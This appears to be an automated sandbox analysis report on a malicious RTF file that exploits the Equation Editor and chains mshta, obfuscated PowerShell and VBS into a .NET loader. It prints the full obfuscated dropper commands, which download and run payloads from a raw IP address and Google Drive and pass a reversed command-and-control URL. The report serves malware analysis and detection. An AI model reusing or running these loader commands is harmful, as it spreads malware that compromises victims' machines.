903c11a14a5af5a8b9594c1f5fa92b22b6d631c07c112a26c23fea6cd586789e

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 06:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bestthingswithgoodnweswthcihcgivingsuchanidea_______itsreallygreatthingseverytimetounderstandbettert.rtf
Size

83KB
MD5

2cf4b897ab47808cc8b96d2804e2ab61
SHA1

5a8dbba3aef1d5388b9ad1e5daa06bb3ec108c78
SHA256

903c11a14a5af5a8b9594c1f5fa92b22b6d631c07c112a26c23fea6cd586789e
SHA512

a64e172ad506d81787e1b0dd539d19b55d1e7a5209313898dc5a0332f5f9b1d34d9ea2e966c25f30109b29baefb6c2b4f2c6fbfb3179fbf24b445e70d4f5ddda
SSDEEP

384:dgNcayG/Quubhij37JcVPut6+u/Bk7qGlco6/Ijwz96i3KJO/b7XB6ZbqYhCt:dgW1Euby37sPVJk7qGJjyoI7XcZO

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2428	EQNEDT32.EXE
6	2764	POwErSHEll.EXE
8	2120	powershell.exe
10	2120	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1444	powershell.exe
2120	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2764	POwErSHEll.EXE
2008	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POwErSHEll.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POwErSHEll.EXE

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2428	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2684	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2764	POwErSHEll.EXE
2008	powershell.exe
2764	POwErSHEll.EXE
2764	POwErSHEll.EXE
1444	powershell.exe
2120	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	POwErSHEll.EXE
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2684	WINWORD.EXE
2684	WINWORD.EXE

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2428 wrote to memory of 2192	2428	EQNEDT32.EXE	32
PID 2428 wrote to memory of 2192	2428	EQNEDT32.EXE	32
PID 2428 wrote to memory of 2192	2428	EQNEDT32.EXE	32
PID 2428 wrote to memory of 2192	2428	EQNEDT32.EXE	32
PID 2192 wrote to memory of 2764	2192	mshta.exe	34
PID 2192 wrote to memory of 2764	2192	mshta.exe	34
PID 2192 wrote to memory of 2764	2192	mshta.exe	34
PID 2192 wrote to memory of 2764	2192	mshta.exe	34
PID 2764 wrote to memory of 2008	2764	POwErSHEll.EXE	36
PID 2764 wrote to memory of 2008	2764	POwErSHEll.EXE	36
PID 2764 wrote to memory of 2008	2764	POwErSHEll.EXE	36
PID 2764 wrote to memory of 2008	2764	POwErSHEll.EXE	36
PID 2764 wrote to memory of 992	2764	POwErSHEll.EXE	37
PID 2764 wrote to memory of 992	2764	POwErSHEll.EXE	37
PID 2764 wrote to memory of 992	2764	POwErSHEll.EXE	37
PID 2764 wrote to memory of 992	2764	POwErSHEll.EXE	37
PID 992 wrote to memory of 2776	992	csc.exe	38
PID 992 wrote to memory of 2776	992	csc.exe	38
PID 992 wrote to memory of 2776	992	csc.exe	38
PID 992 wrote to memory of 2776	992	csc.exe	38
PID 2764 wrote to memory of 2500	2764	POwErSHEll.EXE	40
PID 2764 wrote to memory of 2500	2764	POwErSHEll.EXE	40
PID 2764 wrote to memory of 2500	2764	POwErSHEll.EXE	40
PID 2764 wrote to memory of 2500	2764	POwErSHEll.EXE	40
PID 2500 wrote to memory of 1444	2500	WScript.exe	41
PID 2500 wrote to memory of 1444	2500	WScript.exe	41
PID 2500 wrote to memory of 1444	2500	WScript.exe	41
PID 2500 wrote to memory of 1444	2500	WScript.exe	41
PID 1444 wrote to memory of 2120	1444	powershell.exe	43
PID 1444 wrote to memory of 2120	1444	powershell.exe	43
PID 1444 wrote to memory of 2120	1444	powershell.exe	43
PID 1444 wrote to memory of 2120	1444	powershell.exe	43
PID 2684 wrote to memory of 1132	2684	WINWORD.EXE	45
PID 2684 wrote to memory of 1132	2684	WINWORD.EXE	45
PID 2684 wrote to memory of 1132	2684	WINWORD.EXE	45
PID 2684 wrote to memory of 1132	2684	WINWORD.EXE	45

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bestthingswithgoodnweswthcihcgivingsuchanidea_______itsreallygreatthingseverytimetounderstandbettert.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1132

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\feelnicewithgreatthingsgreatdayscomingforg.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\SysWOW64\wiNDOWSPOwERshElL\v1.0\POwErSHEll.EXE
    "C:\Windows\sYstEM32\wiNDOWSPOwERshElL\v1.0\POwErSHEll.EXE" "POWErsHEll.EXe -eX bYpass -nop -W 1 -c deviCeCRedENTialDepLOYment ; IeX($(IeX('[sySTEM.TEXT.encodinG]'+[Char]0x3A+[ChAr]58+'uTf8.gETSTrING([sYstEm.coNVErT]'+[chaR]0x3A+[CHAR]0X3A+'FroMbase64sTRIng('+[CHar]34+'JE5ha25FY3kgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVSZEVmSU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPVWwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuZlVBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVkSGF0V3MsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWZHdklmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcmZsKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImZEVVZqZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc3BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZPaFAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROYWtuRWN5OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjIuMTUxLjE3OS44NS80MDEvZ2V0YmFja3dpdGhiZXN0dGhpbmdzZm9yZWl0aGVyZ29vZHRoaW5ncy50SUYiLCIkRU5WOkFQUERBVEFcZ2V0YmFja3dpdGhiZXN0dGhpbmdzZm9yZWl0aGVyZ29vZHRoaW4udmJTIiwwLDApO1NUQVJULXNMZWVwKDMpO3N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGdldGJhY2t3aXRoYmVzdHRoaW5nc2ZvcmVpdGhlcmdvb2R0aGluLnZiUyI='+[chAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpass -nop -W 1 -c deviCeCRedENTialDepLOYment
      4⤵
      Evasion via Device Credential Deployment
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2008
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmoox0a6.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:992
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB202.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB201.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2776
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\getbackwithbestthingsforeithergoodthin.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVuVjpjb21TUGVDWzQsMTUsMjVdLWpvaU4nJykgKCAoKCd3RXhpbWFnZVVybCA9IHU2cmh0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaScrJ2Q9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHU2cjt3RXh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuV2ViQ2xpZW50O3dFeGltYWdlQnl0ZXMgPSB3RXh3ZWJDbGllbnQnKycuRG93bicrJ2xvYWREYXRhKHdFeGltYWdlVXJsKTt3RXhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOicrJzpVVEY4LkdldFN0cmluZyh3RXhpbWFnZUJ5dGVzKTt3RXhzdGFydEZsYWcgPSB1NnI8PEJBU0U2NF9TVEFSVD4+dTZyO3dFeGVuZEZsYWcgPSB1NnI8PEJBU0U2NF9FTkQ+PnU2cjt3RXhzdGFydEluZGV4ID0gd0V4aW1hZ2VUZXh0LkluJysnZGV4T2Yod0V4Jysnc3RhcnRGbGFnKTt3RXhlbmRJbmRleCA9IHdFeGltYWdlVGV4dC5JbmRleE9mKHdFeGVuZEZsYWcpO3dFeHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB3RXhlbmRJbmRleCAtZ3Qgd0UnKyd4c3RhcnRJbmRleDt3RXhzdGFydEluZGV4ICs9IHdFeHN0YXJ0JysnRmxhZy5MZW5ndGg7d0V4YmFzZTY0TGVuZ3RoID0gd0V4ZW5kSW5kZXggLSB3RXhzdGFydEluZGV4O3dFeGJhc2U2NENvbW1hbmQgPSB3RXhpbWFnZVRleHQuU3Vic3RyaW5nKHdFeHN0YXJ0SW5kZXgsIHdFeGJhc2U2NExlbmd0aCk7d0V4YmFzZTY0UmUnKyd2ZXJzZWQgPSAtam9pbiAod0V4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnInKydheSgpIHczQyBGb3JFYWNoLU9iamVjdCB7IHdFeF8gfSlbLTEuLi0od0V4YmFzZTY0Q29tbWFuJysnZC5MZW5ndCcrJ2gpXTt3RXhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHdFeGJhc2U2NFJldmVyc2VkKTt3RXhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQod0V4Y29tbWFuZEJ5dGVzKTt3RXh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHU2clZBSXU2cik7d0V4dmFpTWV0aG9kLkludm9rZSh3RXhudWxsLCBAKHU2cnR4dC5DQ0JWRlJFLzEwNC81OC45NzEnKycuMTUxLjI2Ly86cHR0aHU2ciwgdScrJzZyZGVzYXRpdicrJ2Fkb3U2JysnciwgdTZyJysnZGVzYXRpdmEnKydkb3U2ciwgdTZyZGVzYXRpdmFkb3U2ciwgdTZyQWRkSW5Qcm9jZXNzMzJ1NnIsIHU2cmRlc2F0aXZhZG91NnIsIHU2cmRlc2F0aScrJ3ZhZG91NnIsdTZyZGVzYXRpdmFkb3U2cix1NnJkZXNhdGl2YWRvdTZyLHU2cmRlc2F0aXZhZG91NnIsdTZyZGVzYXRpdmFkb3U2cix1NnJkZXNhdGl2YWRvdTZyLCcrJ3U2JysncjF1NnIsdTZyZGUnKydzYXRpdmFkb3U2cikpOycpLVJFUExBQ2UoW2NoQXJdMTE5K1tjaEFyXTY5K1tjaEFyXTEyMCksW2NoQXJdMzYgIC1jUmVwTEFDRShbY2hBcl0xMTkrW2NoQXJdNTErW2NoQXJdNjcpLFtjaEFyXTEyNCAgLVJFUExBQ2UoW2NoQXJdMTE3K1tjaEFyXTU0K1tjaEFyXTExNCksW2NoQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1444
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $enV:comSPeC[4,15,25]-joiN'') ( (('wEximageUrl = u6rhttps://driv'+'e.google.com/uc?export=download&i'+'d=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur u6r;wExwebClient = New-Object Sys'+'tem.Net.WebClient;wEximageBytes = wExwebClient'+'.Down'+'loadData(wEximageUrl);wEximageText = [System.Text.En'+'coding]:'+':UTF8.GetString(wEximageBytes);wExstartFlag = u6r<<BASE64_START>>u6r;wExendFlag = u6r<<BASE64_END>>u6r;wExstartIndex = wEximageText.In'+'dexOf(wEx'+'startFlag);wExendIndex = wEximageText.IndexOf(wExendFlag);wExstartIndex -ge 0 -and wExendIndex -gt wE'+'xstartIndex;wExstartIndex += wExstart'+'Flag.Length;wExbase64Length = wExendIndex - wExstartIndex;wExbase64Command = wEximageText.Substring(wExstartIndex, wExbase64Length);wExbase64Re'+'versed = -join (wExbase64Command.ToCharArr'+'ay() w3C ForEach-Object { wEx_ })[-1..-(wExbase64Comman'+'d.Lengt'+'h)];wExcommandBytes = [System.Convert]::FromBase64String(wExbase64Reversed);wExloadedAssembly = [System.Reflection.Assembly]::Load(wExcommandBytes);wExvaiMethod = [dnlib.IO.Home].GetMethod(u6rVAIu6r);wExvaiMethod.Invoke(wExnull, @(u6rtxt.CCBVFRE/104/58.971'+'.151.26//:ptthu6r, u'+'6rdesativ'+'adou6'+'r, u6r'+'desativa'+'dou6r, u6rdesativadou6r, u6rAddInProcess32u6r, u6rdesativadou6r, u6rdesati'+'vadou6r,u6rdesativadou6r,u6rdesativadou6r,u6rdesativadou6r,u6rdesativadou6r,u6rdesativadou6r,'+'u6'+'r1u6r,u6rde'+'sativadou6r));')-REPLACe([chAr]119+[chAr]69+[chAr]120),[chAr]36 -cRepLACE([chAr]119+[chAr]51+[chAr]67),[chAr]124 -REPLACe([chAr]117+[chAr]54+[chAr]114),[chAr]39) )"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB202.tmp

Filesize
1KB

MD5
00f92bab322fe3067d8cff26518902a0

SHA1
39fc49f104ca4a420ba579ca07fae38f4204ddf2

SHA256
3ee8782dfb38aafbe59e051dd1d46039ad105133386f1e1a02d10b0bc2e9cbb7

SHA512
cb53d9ed0cb66c474739261c1094bf3f33819f20f1b081fa605cabb8122b988a67ac008e7cc25443ce6a593badb9b90a67f8d470051d7f56fb78e9fcf084fe76

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmoox0a6.dll

Filesize
3KB

MD5
1e2be9b1098daae18aa05e71262f0bb5

SHA1
8b0995141c5d7072122afc14d1ceb6084695aa28

SHA256
f78e07cdc2308e438162ddc278bde2c8c2ade5fe81bdfa6dd5952e7273a9d42f

SHA512
77ae7b8e8ca6ddd1cdb751a56b8f10db310cc547685dd5c052ec582155cc3e92606273909a6e20d9dbda2b0bedb82b854cba82994e3aef8c7c903072359fcbf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\zmoox0a6.pdb

Filesize
7KB

MD5
9f37db887da0e25c1a1b3b8fcd4e5759

SHA1
3cf09765ffaf88fdd9b53e368ff888ff207543db

SHA256
c1eaf1ad84705419f08e9e73d54ecc3ad74d464d460bbc5c701a1cca60e380d8

SHA512
b326ee80b72d75b3179ad32f5cf25dbac54dbf627e1c8249ded461d3d2e6bd42a63bed4764b41e94c9b35f75c5b26d45cf1c2796c49caae3edccfd689e8ad0bf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b2368e8c4815f12ef74f3657833b06f2

SHA1
8ecb298529d4eb02554fd8ce3693c8d9ebd43443

SHA256
88d807fc9cd20e4d20be7fd0815d12a01c8fbd4c713c1d183201ae72093361f3

SHA512
47b520e127c61d35490353713a7ab4aa0c8c22f082eb950f6bda35c6a4179527bb2bc955b0228808f1dc5ec2c7906b4a816a4a82f8a513f493255b8a48f467c0

Download Submit
C:\Users\Admin\AppData\Roaming\feelnicewithgreatthingsgreatdayscomingforg.hta

Filesize
130KB

MD5
4c3a1509231a14bf2ce9e9e87eb933b3

SHA1
25589e4db9c5ba3fb7e8bd4458440d17e92110d6

SHA256
255658e545ab6c7c159b06addfa0648639b75505a418253d19c32990d2023b35

SHA512
daa800eaa6075776678f7892edf66a7405f219c140a05fb5dc49186a7d6d311124d5d57cd077799571c3762adefb5e9e7657801299f13fdb423e86e94d9a5bd3

Download Submit
C:\Users\Admin\AppData\Roaming\getbackwithbestthingsforeithergoodthin.vbS

Filesize
137KB

MD5
c4b7863ac7cffebf2a03819a9e08cb26

SHA1
123a6b3360ff14b3594bcba4ef46b699043943fd

SHA256
183b7de6a1e445b2dc1d67472a94e8b2e24bddba07ad6b40eb1718286484f431

SHA512
39aefd42a0ee588fe324547d0c51c35ff67a4c1c5107dd56257726d72e0407e17b16cddd37b6665ffa8f35c1a35883a6c49d93859f403ecb6bf10d87be173ec9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB201.tmp

Filesize
652B

MD5
8ed15da2f81af25ccc806072b6fd1713

SHA1
dc5f9ea6512fd880d976eb7c3329a9a56b2be357

SHA256
2d986002dec8e0a63b4636e0d8b9d07c4393695f279c4d3405a95896cd0a766c

SHA512
57ea83716de83e4cb9bd2512257e424a7fd254ae2837a79407e9c0acca1b318687268e136964c172c2b0ae0dfc66bac9da127927976857bd3aa1228404db6b1a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmoox0a6.0.cs

Filesize
461B

MD5
08e0a7ff393512c51058db2f40ed92a8

SHA1
b09761536033044c5566a86cd8ced8fa9a4be71d

SHA256
f8629c989894e47cd10ad67707a59c586356c5d1bcbd4c8d33d2405a64d9d29f

SHA512
5bceae8649ef7a49937d23cd0db1a75a9640805b7aad59e105292a28cafe09415cf3af1cba9ee14b6da81a93f3a03468a3c1f74cb88ad825119b58bb28b66df0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zmoox0a6.cmdline

Filesize
309B

MD5
386b3c42520964ad1e9928e5fda5f9f7

SHA1
4ee205d279570cc19b581be7c74e878044e33db5

SHA256
66ef043a8a2ca99353a3eec2152eb6c5282a699cfa40a633ab963dd42b49aa62

SHA512
68d232e0afd793600eaf0f2952f32772616b0330e1050d8115a608f529ded84d7741375b7626a9aefb745b7ac2b54d1934bbda23139fcf7a9aae26619fbd8c88

Download Submit
memory/2684-0-0x000000002F7F1000-0x000000002F7F2000-memory.dmp

Filesize
4KB

Download
memory/2684-2-0x0000000070E4D000-0x0000000070E58000-memory.dmp

Filesize
44KB

Download
memory/2684-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2684-59-0x0000000070E4D000-0x0000000070E58000-memory.dmp

Filesize
44KB

Download